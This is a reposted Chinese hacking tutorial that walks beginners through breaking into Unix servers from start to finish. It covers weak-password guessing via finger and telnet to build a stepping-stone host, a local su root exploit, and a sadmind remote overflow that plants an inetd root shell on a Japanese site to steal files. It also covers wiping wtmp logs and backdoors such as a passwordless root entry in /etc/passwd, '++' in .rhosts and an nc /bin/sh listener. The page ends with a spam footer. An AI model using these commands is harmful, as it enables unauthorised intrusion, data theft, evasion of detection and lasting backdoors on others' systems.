• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • unix入侵教程

    發表于:2007-07-04來源:作者:點擊數: 標簽:
    unix 入侵教程 unix入侵教程 我寫這篇文章的目的是給那些想學黑客技術的菜鳥們看的,如果您已經是高手了,您可以跳過去沒必要看了J這里所講敘的是從尋找跳板開始到如何擦PP的完整過程.這篇文章純屬研究性文章.請不要將此用于不正當途徑.后果自負!!!最后,如果要
    unix入侵教程

    unix入侵教程

    我寫這篇文章的目的是給那些想學黑客技術的菜鳥們看的,如果您已經是高手了,您可以跳過去沒必要看了J這里所講敘的是從尋找跳板開始到如何擦PP的完整過程.這篇文章純屬研究性文章.請不要將此用于不正當途徑.后果自負!!!最后,如果要轉載本文請保持文章的完整性,以尊重作者的版權J

    一.跳板篇

    這些年網上黑客事件也日益增多了,各個國家與網絡安全的法令也相繼推出了!因而如果想入侵一個系統.而又不想惹上官司,那么自身安全因該是放在第一位.嗯,那么如何才可以保證自己不被發現呢?談論這個問題的文章出來了很多,但在這眾多的方法中我還是比較喜歡使用跳板主機(也就是平時說的堡壘主機),使用跳板主機有幾點好處,首先是可以隱藏自己,再就是如果有一臺功能齊全的跳板主機可以讓工作達到事半功倍的效果:)那么如果得到一臺跳板主機呢?

    網絡上運行的服務器有很多,最常見的有Unix Linux NT W2k Solaris irix FreeBSD不過在這些主機中我最喜歡用W2k和Linux作為攻擊平臺了。W2k的Crack方法有很多比如:輸入法漏洞,Unicode二次編碼漏洞,IPC共享密碼猜測等等,這些漏洞的利用方法有很多,而如何將NT/W2k做成跳板的文章也不少,因而我在這里也沒有必要再重復了,我建議大家可以看看小榕寫的關于如何利用IPC的補充文檔,上面有如何將NT/W2k做成跳板的詳細過程!

    下面我主要介紹如何制作Linux的跳板主機,要得到一臺Linux可以用破譯弱口令的方法得到,至于破譯弱口令的工具我感覺流光是最好用的:)你可以到www.netxeyes.org免費得到。如果不想下工具的朋友,可以使用Finger命令來得到弱口令列表:

    比如我們已經知道xxx.xxx.xxx.xxx的79端口開放,那么我們可以輕易的得到一些薄弱主機的用戶列表J

    ――――――――――――――――――test――――――――――――――――――

    c:>finger 0@xxx.xxx.xxx.xxx



    [xxx.xxx.xxx.xxx]

    finger:0:no such user

    ------------------------------------------------------end------------------------------------------------------

    失?。海ê呛?。。。沒關系啦,別灰心我們再來?。?!

    -------------------------------------------------------test-----------------------------------------------------

    c:>finger 0@xxx.xxx.xxx.xxx



    [xxx.xxx.xxx.xxx]

    Login Name TTY Idle When Where

    Root ??? <….>

    Bin ??? <….>

    Sys ??? <….>

    ver21 ??? pst/0 211.25.64.2

    liky ??? 437 211.35.26.4

    how ??? pst/2 211.65.24.8

    tong ??? pst/0 211.85.24.5

    test ??? <….>

    dv0928 ??? 52 211.54.25.6

    nobody ??? 021 211.25.42.6

    imnadm ??? 62 211.23.65.5

    哈哈。。。這么多用戶:)這下我發了:)

    c:\>telnet xxx.xxx.xxx.xxx

    Red Hat Linux release 6.0 Publisher's Edition (Hedwig)

    Kernel 2.2.5-15 on an i586



    Login:nobody

    Password:

    Login incorrect

    Login:imnadm

    Password:

    Login incorrect

    Login:test

    Password:

    ##########################################################################

    # However,as the Serv will reload those classes. #

    # inside the “/usr/proj/gipex/class”.you just. #

    # need to remove the old class with the new one. #

    # #########################################################################

    $w

    6:19pm up 61 day(s), 3:40, 3 users, load average: 0.11, 0.07, 0.10



    User tty login@ idle JCPU PCPU what



    root console 4May0161days 2 2 /usr/dt/bin/sdt_shell -c ?



    root pts/4 Fri 4pm 5days tail -f syslog



    delex pts/7 6:19pm w

    $uname –a

    Linux server.syscrew.co.jp 2.2.5-15 #1 Mon Apr 19 21:39:28 EDT 1999 i586 unknown

    $gcc

    gcc: No input files

    不錯哈。。我可以編譯程序了:)

    下面我就要來個本地溢出得到ROOT只有ROOT才可以干我想干的事情?。。?!

    Su.c可以在www.hack.co.za找到?。?!

    好了,下載下來。。。。

    c:\>ftp xxx.xxx.xxx.xxx

    Connected to xxx.xxx.xxx.xxx

    220 server.syscrew.co.jp FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:5

    3 EDT 1999) ready.

    User (xxx.xxx.xxx.xxx:(none)):test

    331 Password required for test.

    Password:

    ftp>put su.c

    200 PORT command successful.

    150 Opening ASCII mode data connection for su.c.

    226 Transfer complete.

    ftp: 12554 bytes sent in 0.00Seconds 12554000.00Kbytes/sec.

    ftp>bye

    221-You have transferred 11991 bytes in 1 files.

    221-Total traffic for this session was 12355 bytes in 1 transfers.

    221-Thank you for using the FTP service on xxx.xxx.xxx.xxx.

    221 Goodbye.

    好了換telnet來

    $gcc –o su su.c

    $./su

    su exploit by XP

    Enjoy!



    Phase 1. Checking paths and write permisions

    Checking for /usr/bin/msgfmt...Ok

    Checking for /usr/bin/objdump...Ok

    Checking write permisions on /tmp...Ok

    Checking read permisions on /bin/su...Ok

    Checking for a valid language... [using cs_CZ] Ok

    Checking that /tmp/LC_MESSAGES does not exist...Ok

    Phase 2. Calculating eat and pad values

    .....................................................................done

    eat = 119 and pad = 2

    Phase 3. Creating evil libc.mo and setting enviroment

    vars

    Phase 4. Getting address of .dtors section of /bin/su

    ..........................................done

    .dtors is at 0x0804ba0c

    Phase 5. Compiling suid shell

    /tmp/xp created Ok

    Phase 6. Executing /bin/su

    - Entering rootshell ;-) -

    bash#

    ok,到這里我們已經得到root了。你現在可以****想干的事情了?。?!

    bash#telnet localhost

    這樣就會將下一個登陸人的IP覆蓋到自己IP上:)這樣就不容易發現了?。?!

    一個跳板Linux主機就作好了,記得保存好喲,我們下次還要用呢?。?!

    二.攻擊篇

    這些天我看準了日本一家經濟方面的網站,想進去拿點東西;)如果發E-mail給網管叫他給我,我想他一定不答應。說不定用那亂七八糟的日文將我罵一頓,可對于我這個不懂日文的家伙可能看了還樂滋滋的,并不覺得是在罵我。那么,就只有一中方法了,那就是我自己進去看看J(下面網站地址用196.0.0.1表示,以便將跳板主機與我們要攻擊的主機分開)

    首先,我們登陸上次已經Crack了的Linux主機吧:)我想剛剛Crack完應該還有效吧;)

    c:\>telnet xxx.xxx.xxx.xxx

    Login:test

    Password:

    ##########################################################################

    # However,as the Serv will reload those classes. #

    # inside the “/usr/proj/gipex/class”.you just. #

    # need to remove the old class with the new one. #

    # #########################################################################

    $./su

    bash#nmap –O 196.0.0.1

    我們通過nmap的掃描結果發現這個系統是SunOS 5.6的主機

    我馬上又登陸到另一臺已經Crack了的SunOS5.6的主機(至于SunOS5.6跳板主機如何得到我就不再在這里浪費口舌了,和Linux跳板主機的制作方法大同小異)

    #rpccinfo –p 196.0.0.1

    program vers proto port service

    100000 4 tcp 111 rpcbind

    100000 3 tcp 111 rpcbind

    100000 4 udp 111 rpcbind

    100000 2 udp 111 rpcbind

    …………

    100232 10 udp 61358 sadmind

    …………

    100001 4 udp 61363 rstatd

    100001 3 udp 61363 rstatd

    根據rpcinfo返回的結果,我發現這臺主機開放了不少RPC服務,其中:

    100232 10 udp 61358 sadmind

    引起我的注意,我記得在CERT的報告有一個關于sadmind的遠程溢出報告,那一定也有相應的溢出程序:)我馬上到www.hack.co.za搜索一番:)最后我找到了一個溢出源程序sadmindex.c(程序太長,我就不在這里羅列了?。?!請大家到www.hack.co.za上找:)

    我們登陸到那臺Linux上

    bash#gcc –o sadmindex sadmindex.c –lrpcsvc –lnsl –lsocket

    bash#./sadmindex –h 196.0.0.1 –c “echo ‘ingreslock stream tcp nowait root /bin/sh **-*’>> /*mp/bob;/usr/sbin/inetd –s /tmp/bob”-s 0xefff9580

    “echo ‘ingreslock stream tcp nowait root /bin/sh **-*’>> /*mp/bob這一句是我們要在目標服務器上執行的命令,他的功能就是生成一個內容是”ingreslock stream tcp nowait root /bin/sh **-*”的/*mp/bob文件,然后再用inetd來啟動,如果成功我們就可以再目標機的1024端口上開一個后門,用TELNET連接上去后就可以直接用root身份執行shell了。。。哈哈是不是很爽?

    Bash#telnet 196.0.0.1 1024

    #

    ok成功J我們成功得到root了?。?!

    #find / -name index.html –print

    在/www/http/htdoc/目錄下發現主頁文件:)我的目的不是改主頁,是要一些文件:)在這只是帶說一下查找的方法!

    #find / -name *.* -print (*.*是我要找的文件。這里省略名字:))

    接下來將文件copy到主頁目錄,這樣我們就可以下載了:)

    #cp /home/www/*.* /www/http/htdoc

    ok完成。我馬上在瀏覽器里打入:http://196.0.0.1/*.*

    下載成功。。。這次攻擊就結束了。。。嘿嘿。。。。下面應該是要擦屁股走人了。。。不過如果你不想也可以。因為我們已經通過跳板登陸的。他們要查到我們也不是很容易的:)不過為了更加保險。也為了我們可以下次在登陸。我們還是擦擦屁股比較好。。。哦。。。天?。。?!

    呀。。。不好。。。媽媽來了。。。叫俺學習去:(沒辦法。。。我們下次接著說吧?。?!

    三.打掃戰場

    我們進行一次攻擊為了不讓管理員發現,同時也為了我們有可能再一次的登陸,我們有必要清理等了記錄。為了找出怎么做的合適方法,我們不妨看看/etc/syslog.conf配置文件的內容。也許對你清理戰場有很大幫助!

    #cat /etc/syslog.conf

    #Log all kernel messages to the console.

    #Loging much else clutters up the screen.

    #kern.*

    #Log anything (except mail)of level info or higher.

    #Don’t log private authentication messages!

    *.info;mail.none;authpriv.none

    #The authpriv file has restricted access.

    Authpriv.*

    #Log all the amil messages in one place.

    Mail.* /var/log/maillog

    #Everybody gets emergency messages,plus log them on another

    #machine.

    *.emerg

    #Save mail and news errors of level err and higher in a

    #special file.

    Uucp,news.crit

    /var/log/spooler

    有了這些信息后我們就知道在/var/log目錄下查找關鍵登陸文件了!簡單的列一個目錄,我們發現存在的各種登記文件,包括cron,maillog,messages,spooler,secure,wtmp和xferlog。

    系統改動的文件有很多,包括了:messages,secure,wtmp和xferlog。既然wtmp是二進制的我們就可以用wzap.c來清理wtmp記錄文件(這個文件在很多黑客網站上能找到源代碼)

    #gcc –o wzap wzap.c

    #who ./wtmp

    joel ftpd17264 jul 1 12:09 (*.*.*.*) 注:(*.*.*.*是跳板主機的IP地址,也是我們

    root tty1 jul 4 22:21 要清除的IP地址)

    root tty1 jul 5 18:25

    …………..

    joel ftpd945 jul 14 17:25(*.*.*.*)

    …………..

    root

    作者: ★果凍★[457283] 2001-07-17 16:34:38 [回復]

    root tty1 jul 20 18:14

    #/opt/wzap

    Enter username to zap from the wtmp:joe1

    Opening file…

    Opening output file…

    Working…

    #who ./wtmp.out

    root tty1 jul 4 22:21

    root tty1 jul 5 18:25

    …….

    好了。。這樣我們的wtmp記錄就刪除了?。?!

    我們接下來可以用VI當然也可以用相應的黑客程序來抹掉其他的登陸記錄。我就不再在這里多說了,方法大同小異的?。?!

    四.后門篇

    1..添加一個root用戶

    echo “jelly::0:0::/:/bin/sh”>> /etc/passwd

    這個帳戶沒有密碼:)不過這很容易被管理員發現,只要他看一下文件就會發現多出來的用戶名!

    2..echo “++” >>/.rhosts

    用戶可以通過rlogin rsh rcp等連接到服務器。不過這種方法也容易暴露自己

    3..修改Sendmail.cf不過這個后門一般的掃描器都會刺探到比如:nessus我想自己的勞動成果是不愿意讓別人隨意拿走的吧?

    4..Shell后門

    這種后門最普遍,也很簡單。通常是在某一特定端口監聽,如果連接上后立即執行/bin/sh。這樣就可以得到shell的使用權了。這類似的源程序可以在一些好點的黑客網站上找到。比如說安全焦點(www.xfocus.org)

    5.修改內核或降低某些軟件版本達到后門目的。不過這種方法實現不容易。如果弄不好就會被發現,所以建議不要輕易使用這種方法

    后門舉例:

    #gcc –o nc nc.c

    #nc –l –d /bin/sh –p 8888

    以后我們只要直接telnet服務器的8888端口就可以得到shell了:)

    好了關于一次完整的入侵過程就講到這里,不過在這里還是要提醒大家,入侵國內網站是十分危險的,請大家三思而行?。。?!

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>